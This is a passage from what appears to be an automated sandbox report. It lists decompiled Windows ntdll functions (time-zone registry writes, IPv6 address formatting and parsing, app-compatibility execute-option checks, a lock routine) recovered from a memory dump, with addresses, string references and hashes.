													__eflags = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E00CB810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E00CB810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E00C1F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}

0x00cb8231
0x00cb8235
0x00cb823a
0x00cb8245
0x00cb824b
0x00cb825c
0x00cb8262
0x00cb8263
0x00cb8266
0x00cb8268
0x00000000
0x00cb826a
0x00cb8270
0x00cb8275
0x00cb8277
0x00cb8295
0x00cb8297
0x00cb838d
0x00cb8391
0x00cb83a9
0x00cb83ab
0x00cb83ad
0x00cb83b6
0x00cb83b9
0x00000000
0x00cb83b9
0x00cb829d
0x00cb829d
0x00cb82b6
0x00cb82b8
0x00000000
0x00cb82be
0x00cb82c0
0x00cb82d5
0x00cb82d7
0x00000000
0x00cb82dd
0x00cb82f3
0x00cb82f5
0x00000000
0x00cb82fb
0x00cb8317
0x00cb8319
0x00000000
0x00cb831b
0x00cb8332
0x00cb8334
0x00000000
0x00cb8336
0x00cb834f
0x00cb8351
0x00000000
0x00cb8353
0x00cb8353
0x00cb835a
0x00000000
0x00cb835c
0x00cb8378
0x00cb837a
0x00cb837c
0x00cb8385
0x00cb8388
0x00cb83bc
0x00cb83cf
0x00cb83cf
0x00cb837c
0x00cb835a
0x00cb8351
0x00cb8334
0x00cb8319
0x00cb82f5
0x00cb82d7
0x00cb82b8
0x00cb83d4
0x00cb83d9
0x00cb83d9
0x00cb8277
0x00cb824d
0x00cb824d
0x00cb824d
0x00cb824d
0x00cb83df

APIs

_wcsnlen.LIBCMT ref: 00CB8240
_wcsnlen.LIBCMT ref: 00CB825C

Strings

StandardStart, xrefs: 00CB82E5
DaylightName, xrefs: 00CB8309
DaylightStart, xrefs: 00CB8341
Bias, xrefs: 00CB8282
StandardName, xrefs: 00CB82A8
TimeZoneKeyName, xrefs: 00CB836A, 00CB839B
StandardBias, xrefs: 00CB82C7
DynamicDaylightTimeDisabled, xrefs: 00CB83C1
DaylightBias, xrefs: 00CB8324

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnlen
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
API String ID: 3628947076-1387797911
Opcode ID: a50c3a52ba51b62319f896993f829375427e66ad74013e740c023ba1c02371c4
Instruction ID: 9025ed5cc875417c56437ebd1d79e1834b64bfe2115987a3c06d463aff07036c
Opcode Fuzzy Hash: a50c3a52ba51b62319f896993f829375427e66ad74013e740c023ba1c02371c4
Instruction Fuzzy Hash: 3041A576241319BAEB119A91CC82FDE77ACEF05B44F104122BA04DA1A1DBB0DB59F7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00C613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00C57707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xc22926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00C57707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xc29cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00C57707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00C57707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00C57707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00C57707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00c613d5
0x00c613d9
0x00c613dc
0x00c613de
0x00c613e1
0x00c613e8
0x00c613ee
0x00c8e8fd
0x00000000
0x00c8e921
0x00c8e921
0x00c8e928
0x00c8e982
0x00c8e98a
0x00000000
0x00c8e99a
0x00c8e99e
0x00c8e9a3
0x00c8e9a8
0x00c8e9b9
0x00c8e978
0x00000000
0x00c8e978
0x00c8e98a
0x00c8e92a
0x00c8e931
0x00c8e944
0x00c8e944
0x00c8e950
0x00c8e954
0x00c8e959
0x00c8e95e
0x00c8e963
0x00c8e970
0x00000000
0x00c8e975
0x00c8e93b
0x00c8e980
0x00000000
0x00c8e980
0x00c8e942
0x00c8e94b
0x00000000
0x00c8e94b
0x00000000
0x00c8e942
0x00c613f4
0x00c613f4
0x00c613f9
0x00c613fc
0x00c613ff
0x00c61406
0x00c8e9cc
0x00c8e9d2
0x00c8e9d2
0x00c8e9cc
0x00c6140c
0x00c61411
0x00c61431
0x00c6143a
0x00c6143c
0x00c6143f
0x00c6143f
0x00c61442
0x00c61447
0x00c614a8
0x00c614ac
0x00c8e9e2
0x00c8e9e7
0x00c8e9ec
0x00c8ea05
0x00c8ea05
0x00000000
0x00c61449
0x00000000
0x00c61449
0x00c6144c
0x00c61459
0x00c61462
0x00c61469
0x00c6146a
0x00c61470
0x00c61473
0x00c61476
0x00c61476
0x00c61490
0x00c61495
0x00c6138e
0x00c61390
0x00c61397
0x00c61398
0x00c61399
0x00c613a1
0x00c613a4
0x00c613a4
0x00c61498
0x00c6149c
0x00c6149f
0x00c614a2
0x00000000
0x00000000
0x00c614a4
0x00000000
0x00c614a4
0x00c61413
0x00c61415
0x00c61416
0x00c61419
0x00c6141c
0x00c61422
0x00c613b7
0x00c613bc
0x00c613bf
0x00c613bf
0x00c613c2
0x00c61424
0x00c61424
0x00c61424
0x00c61427
0x00c6142b
0x00c6142c
0x00c6142c
0x00c6142c
0x00000000
0x00c6141c
0x00c61411

APIs

___swprintf_l.LIBCMT ref: 00C6146B
___swprintf_l.LIBCMT ref: 00C61490
___swprintf_l.LIBCMT ref: 00C8E970

Strings

:%u.%u.%u.%u, xrefs: 00C8E9F4
ffff:, xrefs: 00C8E94B
::%hs%u.%u.%u.%u, xrefs: 00C8E967
::ffff:0:%u.%u.%u.%u, xrefs: 00C8E9B0

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7ba26fc15fe1d71efe52a3ed9e87e72945315253b6cea1ab49c4e5692de8f256
Instruction ID: 0a68b3482663a56f39b70b4a943f09f9bc9e44adad63656b6f140c05fa6d2944
Opcode Fuzzy Hash: 7ba26fc15fe1d71efe52a3ed9e87e72945315253b6cea1ab49c4e5692de8f256
Instruction Fuzzy Hash: DB6125B1904655AACB34DF5AD8C08BEBBB5EF94302B1CC16DF8E647640D674AB80DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C57EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00C57EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xd02088; // 0x7751fe44
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00C57F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00C73F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00C2DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xd04218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00C73F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00C30D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00C73F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00C38375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00C73F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00C9E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00C73F92();
					_t38 = 1;
					L2:
					return E00C2E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00c57f08
0x00c57f0f
0x00c57f12
0x00c57f1b
0x00c57f31
0x00c73ead
0x00c73eb4
0x00000000
0x00000000
0x00c73eba
0x00c73ecd
0x00c73ed2
0x00c73ee1
0x00c73ee7
0x00c73eec
0x00c73f12
0x00c73f18
0x00c73f1a
0x00000000
0x00000000
0x00c73f20
0x00c73f26
0x00c73f28
0x00000000
0x00000000
0x00c73f2e
0x00c73f30
0x00000000
0x00000000
0x00c73f3a
0x00c73f3b
0x00c73f53
0x00c73f64
0x00c73f69
0x00c73f6c
0x00c73f6d
0x00c73f6f
0x00c7e304
0x00c7e30f
0x00c7e315
0x00c7e31e
0x00c7e321
0x00c7e327
0x00c7e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7e32f
0x00c7e32f
0x00c7e337
0x00c7e33a
0x00c7e33b
0x00c7e33d
0x00c7e33f
0x00c7e341
0x00c7e341
0x00c7e34e
0x00c7e353
0x00c7e358
0x00c7e35d
0x00c7e35f
0x00000000
0x00000000
0x00c7e365
0x00c7e365
0x00c7e368
0x00c7e36e
0x00000000
0x00000000
0x00c7e374
0x00c7e32f
0x00c73f75
0x00c73f7a
0x00c73f7c
0x00c73f7e
0x00c73f86
0x00c57f39
0x00c57f47
0x00c57f47
0x00c57f37
0x00c57f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00C73F12

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 00C7E345
ExecuteOptions, xrefs: 00C73F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00C73EC4
Execute=1, xrefs: 00C73F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00C7E2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00C73F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00C73F4A

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: f14f2f233bc3529efe800fe51c87ac64ed78b349432113de2e62449f6116395b
Instruction ID: 84d8aaa1d065d8ea7be4f70062203bbc8935758c4ded7b8ff2164147c06539ea
Opcode Fuzzy Hash: f14f2f233bc3529efe800fe51c87ac64ed78b349432113de2e62449f6116395b
Instruction Fuzzy Hash: E641FA7264031C7ADF20DAD4ECC6FEA73BCAF14700F0041A9F509E6591E670DB859B65

Uniqueness

Uniqueness Score: -1.00%

Function 00C60B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C60B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00C38980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00C2DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00C60CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00C60CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00C606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00C606BA(_t135, _t178) == 0 || E00C60A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00C60CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00C60CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00C606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00C606BA(_t124, _t142) == 0 || E00C60A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00c60b21
0x00c60b24
0x00c60b27
0x00c60b2a
0x00c60b2d
0x00c60b30
0x00c60b33
0x00c60b36
0x00c60b39
0x00c60b3e
0x00c60c65
0x00c60c68
0x00c60c6a
0x00c60c6f
0x00c8eb42
0x00000000
0x00000000
0x00c8eb48
0x00c8eb48
0x00c60c75
0x00c60c7a
0x00c8eb54
0x00000000
0x00000000
0x00000000
0x00c8eb5a
0x00c60c80
0x00c60c84
0x00c8eb98
0x00000000
0x00000000
0x00c8eba6
0x00c60cb8
0x00c60cba
0x00c60cd3
0x00c60cda
0x00c60ce4
0x00c60ce9
0x00000000
0x00c60cec
0x00c60c8c
0x00c8eb63
0x00000000
0x00000000
0x00c8eb70
0x00c8eb75
0x00c8eb7d
0x00000000
0x00000000
0x00c8eb8c
0x00000000
0x00c8eb8c
0x00c60c96
0x00000000
0x00000000
0x00c60ca2
0x00c60cac
0x00c60cb4
0x00000000
0x00000000
0x00c60b44
0x00c60b47
0x00c60b49
0x00000000
0x00000000
0x00c60b4f
0x00c60b50
0x00000000
0x00000000
0x00c60b56
0x00c60b62
0x00c60b7c
0x00c60bac
0x00c60a0f
0x00c8eaaa
0x00000000
0x00c8eac4
0x00c8eac4
0x00c60bd0
0x00c60bd0
0x00c60bd4
0x00c60bd9
0x00000000
0x00000000
0x00c60bdb
0x00c60be0
0x00c8eb0e
0x00c60a1a
0x00000000
0x00c60a1a
0x00c8eb1a
0x00c8eb1f
0x00c8eb27
0x00000000
0x00000000
0x00c8eb36
0x00000000
0x00c8eb36
0x00c60bea
0x00000000
0x00000000
0x00c60bf6
0x00c60c00
0x00c60c03
0x00c60c0b
0x00000000
0x00c60c0b
0x00c8eaaa
0x00000000
0x00c60a15
0x00c60bb6
0x00000000
0x00c60bc6
0x00c60bc6
0x00c60bcb
0x00c60c15
0x00000000
0x00000000
0x00c60c1d
0x00c60c20
0x00c60c21
0x00c60c24
0x00c60c24
0x00c60c26
0x00000000
0x00c60c26
0x00c60bcd
0x00000000
0x00c60bcd
0x00c60b89
0x00c60b89
0x00c60b90
0x00000000
0x00000000
0x00c60b96
0x00000000
0x00c60b96
0x00c60a04
0x00c60a04
0x00c60b9a
0x00c60b9a
0x00c60b9b
0x00c60b9f
0x00000000
0x00000000
0x00000000
0x00c60ba5
0x00c60ac7
0x00c60aca
0x00c8eacf
0x00000000
0x00c8eade
0x00c8eade
0x00c8eae3
0x00000000
0x00000000
0x00c8eaf3
0x00c8eaf6
0x00c8eaf7
0x00c8eafe
0x00c8eb01
0x00000000
0x00c8eb01
0x00c8eacf
0x00c60ad0
0x00c60ad4
0x00000000
0x00000000
0x00c60ada
0x00c60ae6
0x00c60c34
0x00000000
0x00c60c47
0x00c60c49
0x00c60c4a
0x00c60c4e
0x00c60c51
0x00c60c54
0x00c60c57
0x00c60c5a
0x00000000
0x00000000
0x00000000
0x00c60c60
0x00c60afb
0x00c60afe
0x00c60b02
0x00c60b05
0x00c60b08
0x00000000
0x00c60b08
0x00c60ae6
0x00c60b44
0x00c609f8
0x00c609f8
0x00c609f9
0x00000000
0x00000000
0x00c8eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00C60BF6
__fassign.LIBCMT ref: 00C60CA2

Strings

:, xrefs: 00C60BA9
., xrefs: 00C60A0C
:, xrefs: 00C60AC7

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 7c19ffc91f5373d4e99f1b1c28c1fdc663219daa5b3cf448cb6a89c9322048e2
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 7BA19B71D0030AEBCB34DFA4C8856BFB7B5AF45304F34856AE822B7282D7309A45DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00C60554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C60554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
